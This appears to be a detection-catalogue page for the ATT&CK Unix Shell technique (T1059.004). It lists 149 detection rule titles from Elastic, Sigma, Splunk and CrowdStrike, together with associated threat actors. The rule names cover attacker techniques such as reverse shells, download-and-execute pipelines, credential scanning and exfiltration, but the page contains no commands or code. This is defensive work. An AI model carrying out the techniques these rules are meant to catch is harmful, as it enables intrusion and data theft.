EXPLORE
Sign In
← Back to Explore
T1059.004

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Unix shells also support scripts that enable sequential execution of commands...

ESXiLinuxmacOSNetwork Devices
149
Detections
4
Sources
10
Threat Actors

BY SOURCE

128elastic14sigma6splunk_escu1crowdstrike_cql

PROCEDURES (82)

General Monitoring12 detections

Auto-extracted: 12 detections for general monitoring

Persist9 detections

Auto-extracted: 9 detections for persist

Process Creation Monitoring7 detections

Auto-extracted: 7 detections for process creation monitoring

Suspicious4 detections

Auto-extracted: 4 detections for suspicious

Token4 detections

Auto-extracted: 4 detections for token

Http3 detections

Auto-extracted: 3 detections for http

Child Process3 detections

Auto-extracted: 3 detections for child process

Container3 detections

Auto-extracted: 3 detections for container

Aws3 detections

Auto-extracted: 3 detections for aws

Download3 detections

Auto-extracted: 3 detections for download

Exfiltrat3 detections

Auto-extracted: 3 detections for exfiltrat

Network Connection Monitoring3 detections

Auto-extracted: 3 detections for network connection monitoring

Bypass2 detections

Auto-extracted: 2 detections for bypass

Obfuscat2 detections

Auto-extracted: 2 detections for obfuscat

Command And Control2 detections

Auto-extracted: 2 detections for command and control

Inject2 detections

Auto-extracted: 2 detections for inject

Remote2 detections

Auto-extracted: 2 detections for remote

Inject2 detections

Auto-extracted: 2 detections for inject

Parent Process2 detections

Auto-extracted: 2 detections for parent process

Privilege2 detections

Auto-extracted: 2 detections for privilege

Suspicious2 detections

Auto-extracted: 2 detections for suspicious

Remote2 detections

Auto-extracted: 2 detections for remote

Kernel2 detections

Auto-extracted: 2 detections for kernel

Credential2 detections

Auto-extracted: 2 detections for credential

Startup2 detections

Auto-extracted: 2 detections for startup

Inject2 detections

Auto-extracted: 2 detections for inject

Exfiltrat2 detections

Auto-extracted: 2 detections for exfiltrat

Script Execution Monitoring2 detections

Auto-extracted: 2 detections for script execution monitoring

Persist2 detections

Auto-extracted: 2 detections for persist

Container2 detections

Auto-extracted: 2 detections for container

Parent Process2 detections

Auto-extracted: 2 detections for parent process

Parent Process2 detections

Auto-extracted: 2 detections for parent process

Kubernetes2 detections

Auto-extracted: 2 detections for kubernetes

Obfuscat2 detections

Auto-extracted: 2 detections for obfuscat

Child Process1 detections

Auto-extracted: 1 detections for child process

Cloud Monitoring1 detections

Auto-extracted: 1 detections for cloud monitoring

Exfiltrat1 detections

Auto-extracted: 1 detections for exfiltrat

Privilege1 detections

Auto-extracted: 1 detections for privilege

Service1 detections

Auto-extracted: 1 detections for service

Unusual1 detections

Auto-extracted: 1 detections for unusual

Unusual1 detections

Auto-extracted: 1 detections for unusual

Suspicious1 detections

Auto-extracted: 1 detections for suspicious

Child Process1 detections

Auto-extracted: 1 detections for child process

Service1 detections

Auto-extracted: 1 detections for service

Unusual1 detections

Auto-extracted: 1 detections for unusual

Privilege1 detections

Auto-extracted: 1 detections for privilege

Command And Control1 detections

Auto-extracted: 1 detections for command and control

Suspicious1 detections

Auto-extracted: 1 detections for suspicious

Registry Monitoring1 detections

Auto-extracted: 1 detections for registry monitoring

Persist1 detections

Auto-extracted: 1 detections for persist

Command And Control1 detections

Auto-extracted: 1 detections for command and control

Download1 detections

Auto-extracted: 1 detections for download

Service1 detections

Auto-extracted: 1 detections for service

Remote1 detections

Auto-extracted: 1 detections for remote

Obfuscat1 detections

Auto-extracted: 1 detections for obfuscat

Obfuscat1 detections

Auto-extracted: 1 detections for obfuscat

Api1 detections

Auto-extracted: 1 detections for api

Lateral1 detections

Auto-extracted: 1 detections for lateral

Bypass1 detections

Auto-extracted: 1 detections for bypass

Inject1 detections

Auto-extracted: 1 detections for inject

Lateral1 detections

Auto-extracted: 1 detections for lateral

Kernel Monitoring1 detections

Auto-extracted: 1 detections for kernel monitoring

Privilege1 detections

Auto-extracted: 1 detections for privilege

Credential1 detections

Auto-extracted: 1 detections for credential

Download1 detections

Auto-extracted: 1 detections for download

C21 detections

Auto-extracted: 1 detections for c2

Service1 detections

Auto-extracted: 1 detections for service

Base641 detections

Auto-extracted: 1 detections for base64

C21 detections

Auto-extracted: 1 detections for c2

Startup1 detections

Auto-extracted: 1 detections for startup

Kernel1 detections

Auto-extracted: 1 detections for kernel

Kernel1 detections

Auto-extracted: 1 detections for kernel

Persist1 detections

Auto-extracted: 1 detections for persist

Base641 detections

Auto-extracted: 1 detections for base64

Token1 detections

Auto-extracted: 1 detections for token

Kubernetes1 detections

Auto-extracted: 1 detections for kubernetes

Container1 detections

Auto-extracted: 1 detections for container

Suspicious1 detections

Auto-extracted: 1 detections for suspicious

Aws1 detections

Auto-extracted: 1 detections for aws

C21 detections

Auto-extracted: 1 detections for c2

Persist1 detections

Auto-extracted: 1 detections for persist

Bypass1 detections

Auto-extracted: 1 detections for bypass

THREAT ACTORS (10)

APT41Aquatic PandaContagious InterviewRockeScattered SpiderSea TurtleTeamTNTUNC3886Velvet AntVolt Typhoon

DETECTIONS (149)

Attempt to Install Kali Linux via WSL
elastichigh
AWS EC2 LOLBin Execution via SSM SendCommand
elasticmedium
AWS EC2 Startup Shell Script Change
sigmahigh
AWS SSM `SendCommand` with Run Shell Command Parameters
elasticmedium
Base64 Decoded Payload Piped to Interpreter
elastichigh
Boot File Copy
elasticlow
BPF filter applied using TC
elastichigh
BPFtrace Unsafe Option Usage
sigmamedium
Cupsd or Foomatic-rip Shell Execution
elastichigh
Curl Execution via Shell Profile
elastichigh
Curl or Wget Egress Network Connection via LoLBin
elasticmedium
Decoded Payload Piped to Interpreter Detected via Defend for Containers
elastichigh
Direct Interactive Kubernetes API Request by Common Utilities
elasticmedium
Direct Interactive Kubernetes API Request by Unusual Utilities
elasticlow
Direct Interactive Kubernetes API Request Detected via Defend for Containers
elasticlow
Dracut Module Creation
elasticlow
Dynamic Linker (ld.so) Creation
elasticmedium
Egress Connection from Entrypoint in Container
elasticmedium
Encoded Payload Detected via Defend for Containers
elasticmedium
Equation Group Indicators
sigmahigh
Execution via GitHub Actions Runner
elasticmedium
Execution via OpenClaw Agent
elasticmedium
Execution via Windows Subsystem for Linux
elasticmedium
Execution with Explicit Credentials via Scripting
elasticmedium
File Creation and Execution Detected via Defend for Containers
elasticmedium
File Creation by Cups or Foomatic-rip Child
elasticmedium
File Creation in /var/log via Suspicious Process
elasticmedium
File Creation, Execution and Self-Deletion in Suspicious Directory
elastichigh
File Download Detected via Defend for Containers
elasticmedium
File Transfer or Listener Established via Netcat
elasticmedium
File Transfer Utility Launched from Unusual Parent
elasticmedium
First Time Python Spawned a Shell on Host
elasticmedium
Forbidden Direct Interactive Kubernetes API Request
elasticmedium
Git Hook Child Process
elasticlow
Git Hook Command Execution
elasticlow
Git Hook Created or Modified
elasticlow
Git Hook Egress Network Connection
elasticmedium
GitHub Authentication Token Access via Node.js
elasticmedium
Host File System Changes via Windows Subsystem for Linux
elasticmedium
Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers
elastichigh
Initramfs Unpacking via unmkinitramfs
elasticlow
InstallFix on macOS
crowdstrike_cql
Interactive Bash Suspicious Children
sigmamedium
Interactive Exec Into Container Detected via Defend for Containers
elasticlow
Interactive Shell Launched via Unusual Parent Process in a Container
elasticmedium
Interactive Shell Spawn Detected via Defend for Containers
elasticlow
Interactive Terminal Spawned via Perl
elastichigh
Interactive Terminal Spawned via Python
elastichigh
JexBoss Command Sequence
sigmahigh
Kill Command Execution
elasticlow
Kubernetes Direct API Request via Curl or Wget
elasticmedium
Linux Decode Base64 to Shell
splunk_escu
Linux Magic SysRq Key Abuse
splunk_escu
Linux Restricted Shell Breakout via Linux Binary(s)
elasticmedium
Linux Reverse Shell Indicator
sigmacritical
Linux Suspicious React or Next.js Child Process
splunk_escu
Linux Unix Shell Enable All SysRq Functions
splunk_escu
MacOS LOLbin
splunk_escu
Manual Dracut Execution
elasticlow
Memory Swap Modification
elasticmedium
Multi-Base64 Decoding Attempt from Suspicious Location
elasticmedium
Netcat File Transfer or Listener Detected via Defend for Containers
elasticmedium
Netcat Listener Established via rlwrap
elasticmedium
Network Connection by Cups or Foomatic-rip Child
elastichigh
Network Connection from Binary with RWX Memory Region
elasticmedium
Network Connection via Recently Compiled Executable
elasticmedium
Network Connections Initiated Through XDG Autostart Entry
elasticmedium
NetworkManager Dispatcher Script Creation
elasticlow
Node.js Pre or Post-Install Script Execution
elasticmedium
Nohup Execution
sigmamedium
Openssl Client or Server Activity
elasticmedium
Payload Execution via Shell Pipe Detected by Defend for Containers
elasticmedium
Pod or Container Creation with Suspicious Command-Line
elasticmedium
Potential Abuse of Linux Magic System Request Key
sigmamedium
Potential Code Execution via Postgresql
elasticmedium
Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers
elasticmedium
Potential Etherhiding C2 via Blockchain Connection
elastichigh
Potential Execution via SSH Backdoor
elasticmedium
Potential Git CVE-2025-48384 Exploitation
elastichigh
Potential Hex Payload Execution via Command-Line
elasticlow
Potential Hex Payload Execution via Common Utility
elasticlow
Potential JAVA/JNDI Exploitation Attempt
elastichigh
Potential Kubeletctl Execution Detected via Defend for Containers
elasticlow
Potential Malware-Driven SSH Brute Force Attempt
elasticmedium
Potential Meterpreter Reverse Shell
elastichigh
Potential Reverse Shell
elastichigh
Potential Reverse Shell via Background Process
elastichigh
Potential Reverse Shell via Child
elastichigh
Potential Reverse Shell via Java
elasticmedium
Potential Reverse Shell via Suspicious Binary
elastichigh
Potential Reverse Shell via Suspicious Child Process
elastichigh
Potential Reverse Shell via UDP
elasticmedium
Potential SAP NetWeaver Exploitation
elastichigh
Potential Shell via Wildcard Injection Detected
elasticmedium
Potential Upgrade of Non-interactive Shell
elasticmedium
Printer User (lp) Shell Execution
elastichigh
Privileged Container Creation with Host Directory Mount
elastichigh
Privileged Docker Container Creation
elasticmedium
Process Backgrounded by Unusual Parent
elasticlow
Process Spawned from Message-of-the-Day (MOTD)
elastichigh
Process Started with Executable Stack
elasticlow
Proxy Shell Execution via Busybox
elasticlow
Python Path File (pth) Creation
elasticlow
Python Site or User Customize File Creation
elasticlow
Root Network Connection via GDB CAP_SYS_PTRACE
elasticmedium
Script Interpreter Spawning Credential Scanner - Linux
sigmahigh
Service Account Token or Certificate Access Followed by Kubernetes API Request
elasticmedium
Shell Execution via Apple Scripting
elasticmedium
Simple HTTP Web Server Connection
elasticlow
Simple HTTP Web Server Creation
elasticlow
Suspicious Activity in Shell Commands
sigmahigh
Suspicious APT Package Manager Execution
elasticlow
Suspicious APT Package Manager Network Connection
elasticmedium
Suspicious Browser Child Process
elastichigh
Suspicious Commands Linux
sigmamedium
Suspicious Content Extracted or Decompressed via Funzip
elasticmedium
Suspicious Download and Execute Pattern via Curl/Wget
sigmahigh
Suspicious Echo or Printf Execution Detected via Defend for Containers
elastichigh
Suspicious Emond Child Process
elasticmedium
Suspicious Execution via Windows Subsystem for Linux
elasticlow
Suspicious File Creation via Pkg Install Script
elastichigh
Suspicious Filename with Embedded Base64 Commands
sigmahigh
Suspicious Installer Package Spawns Network Event
elasticmedium
Suspicious Interpreter Execution Detected via Defend for Containers
elasticmedium
Suspicious Linux Discovery Commands
splunk_escu
Suspicious macOS MS Office Child Process
elasticmedium
Suspicious Mining Process Creation Event
elasticmedium
Suspicious Named Pipe Creation
elastichigh
Suspicious Path Invocation from Command Line
elasticlow
Suspicious Process Execution Detected via Defend for Containers
elastichigh
Suspicious React Server Child Process
elastichigh
Suspicious Reverse Shell Command Line
sigmahigh
Suspicious System Commands Executed by Previously Unknown Executable
elasticlow
System Path File Creation and Execution Detected via Defend for Containers
elasticmedium
Systemd Shell Execution During Boot
elasticlow
Uncommon Destination Port Connection by Web Server
elasticlow
Unknown Execution of Binary with RWX Memory Region
elasticmedium
Unusual Base64 Encoding/Decoding Activity
elasticlow
Unusual Command Execution from Web Server Parent
elasticlow
Unusual D-Bus Daemon Child Process
elasticlow
Unusual Execution from Kernel Thread (kthreadd) Parent
elasticmedium
Unusual Interactive Shell Launched from System User
elasticmedium
Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments
elastichigh
Unusual Pkexec Execution
elastichigh
Unusual Process Spawned from Web Server Parent
elasticlow
Unusual Web Server Command Execution
elasticmedium
Web Server Exploitation Detected via Defend for Containers
elastichigh
Web Server Potential Command Injection Request
elasticlow
Windows Subsystem for Linux Distribution Installed
elasticmedium